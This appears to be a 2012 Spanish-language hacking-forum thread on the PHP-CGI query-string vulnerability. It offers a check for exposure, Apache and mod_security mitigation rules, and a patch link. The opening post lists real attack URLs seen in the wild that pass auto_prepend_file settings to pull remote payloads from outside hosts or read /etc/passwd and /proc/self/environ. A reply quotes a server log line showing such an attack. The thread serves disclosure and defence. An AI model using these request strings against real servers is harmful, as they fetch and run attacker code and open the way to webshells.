elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Grave vulnerabilidad PHP en modo CGI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Grave vulnerabilidad PHP en modo CGI  (Leído 5,354 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Grave vulnerabilidad PHP en modo CGI
« en: 15 Mayo 2012, 18:03 pm »

Una vulnerabilidad vigente desde hace 8 años y la desucbren por casualidad  >:D

Apache mod_cgi

¿Cómo comprobar si su sitio es vulnerable?

Añadiendo -s? Al final de la URL  de cualquierscript PHP, como:
Código:
ww.tusitioweb.com/index.php?-s

Código:
?-s

http://example.com/index.php?-dauto_prepend_file%3d/etc/passwd+-n

Si ve el código PHP, el PHP es vulnerable.
Si ves a tu página normalmente, su sitio no se ve afectada.

Código:
    Allow_url_include: Permite el uso de fopen con algunas funciones como include, include_once,require, require_once.

    Auto_prepend_file: Permite especificar un archivo que será interpretado antes del fichero principal.

Ejemplos ataque (la mayoría intentando usar una webshell o ejecutando un backdoor)

/index.php?-s'
/index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.5999mu.com/a.txt'
/index.php?-s/wp-admin/install.php'
/wordpress/index.php?-s'
/wp/index.php?-s'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dphp:%2f%2finput'
/index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.qz0451.com/1.txt'

¿Cómo mitigar el problema?
Si su sitio se ve afectada, y puede que tenga disponible y habilitado mod_rewrite en Apache, por favor, añadir a la htaccess la regla de reescritura.:

El siguiente código no funciona:

Código:
RewriteEngine on

RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

Si funciona:

Código:
    RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
    RewriteRule ^(.*) $1? [L]

Regla con mod_security

Código:
SecRule QUERY_STRING "^-[sdcr]" "phase:1,t:none,t:urlDecodeUni,t:removeWhitespace,block,log,msg:'Potential PHP-CGI Exploit Attempt'"

Solución:

Actualizar a PHP 5.4.3 and PHP 5.3.13
http://www.php.net/archive/2012.php#id2012-05-08-1

Fuentes:
http://ompldr.org/vZGxxaQ
http://www.php.net/archive/2012.php#id2012-05-03-1
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

En Español:
http://www.elladodelmal.com/2012/05/ejecutar-codigo-remoto-en-apache-con.html
http://www.pentester.es/2012/05/explotando-php-cgi.html



« Última modificación: 15 Mayo 2012, 19:38 pm por el-brujo » En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Grave vulnerabilidad PHP en modo CGI
« Respuesta #1 en: 15 Mayo 2012, 20:47 pm »

Esto lo se desde hace bastante. Los de Strato enviaron una circular avisando.

PD: Muchas gracias por publicarlo.


« Última modificación: 15 Mayo 2012, 20:52 pm por dimitrix » En línea




Graphixx


Desconectado Desconectado

Mensajes: 1.336


Full Stack Developer


Ver Perfil WWW
Re: Grave vulnerabilidad PHP en modo CGI
« Respuesta #2 en: 17 Mayo 2012, 09:42 am »

Video de la vulnerabilidad:
http://youtu.be/ZcUsR9DSSOk


PD: por que no sale el video incrustado, si le pongo las etiquetas de [ youtube=425,350 ]youtube[ /youtube ] grrrr  >:D
En línea

Nada tiene fin solo hay pequeñas pausas, pausas que determinan el comienzo de otros. Graphixx Rōninnovation
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Grave vulnerabilidad PHP en modo CGI
« Respuesta #3 en: 17 Mayo 2012, 17:41 pm »

PD: por que no sale el video incrustado, si le pongo las etiquetas de [ youtube=425,350 ]youtube[ /youtube ] grrrr  >:D

Las nuevas urls de youtube no funcionan, hay que poner el código viejo de los vídeos:

Código:
[youtube=425,350]http://www.youtube.com/watch?v=ZcUsR9DSSOk[/youtube]
En línea

squared

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Grave vulnerabilidad PHP en modo CGI
« Respuesta #4 en: 19 Mayo 2012, 13:36 pm »

Gracias por la info. Estaban utilizando este exploit en mi web para modificar los .htaccess y redirigir a una web rusa, a parte de haberme encontrado webshells inyectados en diferentes .php del joomla.

Estos registros del log son los que me han traido hasta aquí

Código:
151.199.14.220 - - [18/May/2012:17:52:40 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 200 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

Gracias de nuevo
« Última modificación: 19 Mayo 2012, 13:41 pm por squared » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines